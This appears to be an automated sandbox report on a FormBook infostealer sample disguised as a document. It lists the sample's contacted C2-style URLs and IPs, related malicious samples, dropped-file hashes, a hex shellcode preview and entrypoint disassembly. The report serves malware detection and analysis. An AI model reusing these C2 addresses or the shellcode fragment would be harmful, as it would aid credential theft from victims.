https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta	netbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.empowermedeco.com	dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3692339141.0000000004BCF000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 0000000A.00000002.3692885046.00000000045AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.sedo.com/services/parking.php3	dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmp	false		high
https://donnavariedades.com/fo8o?FBEd=l	netbtugc.exe, 0000000A.00000002.3692885046.0000000004BF6000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003956000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi	netbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmp	false		high
https://hm.baidu.com/hm.js?	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.empowermedeco.com/fo8o/?FBEd=mxnR	netbtugc.exe, 0000000A.00000002.3692885046.0000000004F1A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003C7A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
185.237.107.49	www.joyesi.xyz	Ukraine	56421	UA-WEECOMI-ASUA	true
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
34.111.148.214	www.660danm.top	United States	15169	GOOGLEUS	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
202.172.28.202	www.kasegitai.tokyo	Japan	37907	DIGIROCKDigiRockIncJP	false
46.30.213.191	www.antonio-vivaldi.mobi	Denmark	51468	ONECOMDK	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1438042
Start date and time:	2024-05-08 10:47:43 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Document 151-512024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@14/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 49 Number of non-executed functions: 300
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
10:49:23	API Interceptor	10545212x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	SHIPMT-97 6533 1936ROBUTECH.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.winhgx.com/u88q/
	BE.exe	Get hash	malicious	FormBook	Browse	www.5597043.com/nrup/
	Arrival Notice.doc	Get hash	malicious	FormBook	Browse	www.5597043.com/nrup/
	SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtf	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.5597043.com/nrup/
	150-425-2024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	Statement Of Account.exe	Get hash	malicious	FormBook	Browse	www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	fedex awb &Invoice.vbs	Get hash	malicious	FormBook	Browse	www.winhgx.com/r6ib/
185.237.107.49	150-425-2024.exe	Get hash	malicious	FormBook	Browse
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
154.215.72.110	150-425-2024.exe	Get hash	malicious	FormBook	Browse
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse
195.110.124.133	SHIPMT-97 6533 1936ROBUTECH.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.dosacontrol.com/u88q/
	150-425-2024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	yx0H3RO9ur.exe	Get hash	malicious	FormBook	Browse	www.rcpbooks.site/ns03/?UPlLi=vFQdbbR8L2nPLn&uTsxF=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
	Grundforbedre39.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	Apexes.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/
	oZF2kXw4ZRc8NjL.exe	Get hash	malicious	FormBook	Browse	www.rcpbooks.site/ns03/?wHut=ghlHUvuPX&yBkpfpPX=LY9IMeCXDxrmkBkQpTG36JChwL1RxDqQm+j8bD1e2UXkf2UJCaZNetcSSzDM9AEFNVBS
	Arborean.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.guiguigohost.com/m9so/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.joyesi.xyz	150-425-2024.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
	Product_Specs.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.237.107.49
www.3xfootball.com	150-425-2024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exe	Get hash	malicious	FormBook	Browse	154.215.74.46
www.antonio-vivaldi.mobi	150-425-2024.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	46.30.213.191
	doc2009988876370093845_1601202400.exe	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	46.30.213.185
	SecuriteInfo.com.Win32.CrypterX-gen.14209.1079.exe	Get hash	malicious	FormBook	Browse	46.30.213.185
	PO203-09024.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	PO#YATCH-INT'L.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	QUOTATIONYATCHINT'L.exe	Get hash	malicious	FormBook, NSISDropper	Browse	46.30.213.185
	PURCHASE_ORDER_091020.exe	Get hash	malicious	FormBook	Browse	46.30.213.185

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	OSL332C-HBLx#U180es#U180el#U180ex#U180e..exe	Get hash	malicious	FormBook	Browse	160.124.95.43
	YLvVXuRyhA.elf	Get hash	malicious	Mirai	Browse	154.218.213.199
	JQf0ehYRnW.elf	Get hash	malicious	Mirai	Browse	154.215.127.76
	2024_04_005.exe	Get hash	malicious	FormBook, GuLoader	Browse	160.124.21.234
	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	156.242.52.107
	Scan File_pdf.exe	Get hash	malicious	FormBook	Browse	156.242.52.107
	BnH5cceMGl.elf	Get hash	malicious	Mirai	Browse	160.124.107.231
	150-425-2024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	oVOImRIAaz.elf	Get hash	malicious	Mirai	Browse	156.252.113.238
	m2 Cotizaci#U00f3n-1634.pdf.exe	Get hash	malicious	FormBook	Browse	160.124.21.234
REGISTER-ASIT	z8s945rPmZ.exe	Get hash	malicious	SystemBC	Browse	81.88.58.196
	SHIPMT-97 6533 1936ROBUTECH.exe	Get hash	malicious	FormBook, GuLoader	Browse	195.110.124.133
	2024_04_005.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	shipping doc.exe	Get hash	malicious	FormBook	Browse	81.88.63.46
	150-425-2024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	160420241245287.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
	2024164846750.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.63.46
UA-WEECOMI-ASUA	150-425-2024.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
	SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
	DOC 331-100920-00.exe	Get hash	malicious	FormBook	Browse	185.237.107.49
SEDO-ASDE	RE Draft BL for BK#440019497 REF#388855.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	LS24SDE.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.123
	kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	SARAY_RECEIPT.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	SHIPMT-97 6533 1936ROBUTECH.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.94
	Dagtjenesternes.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	factura-20240G000009.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	Demand G2-2024.xlsx	Get hash	malicious	FormBook	Browse	91.195.240.19
	POD-L2024.05.06 MSC DESIREE DS5016RTA24.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.123
	Inv 070324.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autB569.tmp

Download File

Process:	C:\Users\user\Desktop\Document 151-512024.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994029046453044
Encrypted:	true
SSDEEP:	3072:P8mwFzK0eX0mcT2dftSU1THjhRqU3S2FabA1im6R2ldqgTtSxEMozosAGyDt/Fk9:UmQK0/mcTkt9LmUTsc1X5SyMTslylFTq
MD5:	3B92C7C7E1D069D027090BBB8C4C6B3C
SHA1:	473EE15A3C0ADF847ED03B6861EE051C78E6384C
SHA-256:	297D72A6CA8E98558823B71F551EC72508B1ADCEC64596D41387978FD0FFBD54
SHA-512:	D5C52DDD13AB9B2A47159C46FA8E50E54794977D5740ABFA2B6BA0456AD0381750110749804FFC771213189BE1CDCA1EC89C174E87C72C71AF3D1CA4F7300E4E
Malicious:	false
Reputation:	low
Preview:	x.w..G3YS...8....5P...o0Q...91FYPB505S2R3G3YSEK91FYPB505S2.3G3WL.E9.O.q.4\|.rf:Z4.)!*,KP+y3#[^Z'.0VgA,=e"W....bX_Q6._>M.YSEK91F QK..U4.oS .d3".#..j"R./....'T.I....&>..\S]nR5.G3YSEK91..PBy14S.:..3YSEK91F.P@4;4X2R#C3YSEK91FY.W505C2R3g7YSE.91VYPB705U2R3G3YSCK91FYPB5.1S2P3G3YSEI9q.YPR50%S2R3W3YCEK91FY@B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91Fw$'MD5S2.<C3YCEK9!BYPR505S2R3G3YSEK9.FY0B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK9

C:\Users\user\AppData\Local\Temp\autB5B8.tmp

Download File

Process:	C:\Users\user\Desktop\Document 151-512024.exe
File Type:	data
Category:	dropped
Size (bytes):	9896
Entropy (8bit):	7.592587996331733
Encrypted:	false
SSDEEP:	192:C+cK50L02Jtyl2ftvwmziMVC6baopzBvq5C4RoZJzOjXyBwhbfsYSGWQ9E:h750LRJtyl2ftLCghBmNoZPBefsYhWQG
MD5:	9DB7D0DE71A42A1D64D9F7575FE55330
SHA1:	5AEE9FCA4411B58EBF5B3EDB6E43BFFFAE69FD0A
SHA-256:	C418456986F2FF67D6BE6A0F9C6981E21A21D8E5CF7B4153EAA3C320965B7E3E
SHA-512:	39BBF2070AB7927F164B1180180E8CC4ACA8F6F9512F165597E44BB771F0EAC4A9FB386AEDAF232AFD96CA8C80103F3C35D6DC87A7D2B8CC0132A78B65045AB9
Malicious:	false
Reputation:	low
Preview:	EA06..p0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\colliquefaction

Download File

Process:	C:\Users\user\Desktop\Document 151-512024.exe
File Type:	ASCII text, with very long lines (28720), with no line terminators
Category:	dropped
Size (bytes):	28720
Entropy (8bit):	3.5960357651055395
Encrypted:	false
SSDEEP:	768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNboE+I026c024vfF3if68:wiTZ+2QoioGRk6ZklputwjpjBkCiw2R3
MD5:	EF71BFB3991697BEB75010ABE4817290
SHA1:	EC310A5F22E9D788B6CB79649FF462DCD39BA618
SHA-256:	68846BAEDE1947F26706A4A795C0BEFD6D71BA3223ACE3278AD5ADD04849F077
SHA-512:	854496BB780192D0DC0101DE31B08F8E610AD2B73571A18A1342065D5C1398A489FA645475B7C3DAA205BCD19B6ACA1FEF43AE1F6B1192AC2FB338DEE4D81DC4
Malicious:	false
Reputation:	low
Preview:	048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

C:\Users\user\AppData\Local\Temp\gobioid

Download File

Process:	C:\Users\user\Desktop\Document 151-512024.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.994029046453044
Encrypted:	true
SSDEEP:	3072:P8mwFzK0eX0mcT2dftSU1THjhRqU3S2FabA1im6R2ldqgTtSxEMozosAGyDt/Fk9:UmQK0/mcTkt9LmUTsc1X5SyMTslylFTq
MD5:	3B92C7C7E1D069D027090BBB8C4C6B3C
SHA1:	473EE15A3C0ADF847ED03B6861EE051C78E6384C
SHA-256:	297D72A6CA8E98558823B71F551EC72508B1ADCEC64596D41387978FD0FFBD54
SHA-512:	D5C52DDD13AB9B2A47159C46FA8E50E54794977D5740ABFA2B6BA0456AD0381750110749804FFC771213189BE1CDCA1EC89C174E87C72C71AF3D1CA4F7300E4E
Malicious:	false
Reputation:	low
Preview:	x.w..G3YS...8....5P...o0Q...91FYPB505S2R3G3YSEK91FYPB505S2.3G3WL.E9.O.q.4\|.rf:Z4.)!*,KP+y3#[^Z'.0VgA,=e"W....bX_Q6._>M.YSEK91F QK..U4.oS .d3".#..j"R./....'T.I....&>..\S]nR5.G3YSEK91..PBy14S.:..3YSEK91F.P@4;4X2R#C3YSEK91FY.W505C2R3g7YSE.91VYPB705U2R3G3YSCK91FYPB5.1S2P3G3YSEI9q.YPR50%S2R3W3YCEK91FY@B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91Fw$'MD5S2.<C3YCEK9!BYPR505S2R3G3YSEK9.FY0B505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK91FYPB505S2R3G3YSEK9

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.133480817080476
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Document 151-512024.exe
File size:	1'246'208 bytes
MD5:	8e009a43143d3afdde5e91b311e4018b
SHA1:	332f1f946b6aaadecb3de55c5880d0c61021073f
SHA256:	75cdc03e89729226eaefb9259aab9beb4052ddef0280bbf53dcaf8ef9f58d917
SHA512:	2db471514d4720afed163a576b7c25ce6e45bf46c129ce03ebaa1422e588dcbe16a6107fd34fb7606f6b57e0a5623bbe0ce314584ddd060639a1f6e9345daf24
SSDEEP:	24576:YqDEvCTbMWu7rQYlBQcBiT6rprG8a+z74Zcy9xCN6:YTvC/MTQYxsWR7a+vyn
TLSH:	2845CF0273D1C062FFAB92334B5AF65156BC69260123E61F13A81DB9FE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6631A001 [Wed May 1 01:50:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F03A4D2D423h
jmp 00007F03A4D2CD2Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F03A4D2CF0Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F03A4D2CEDAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
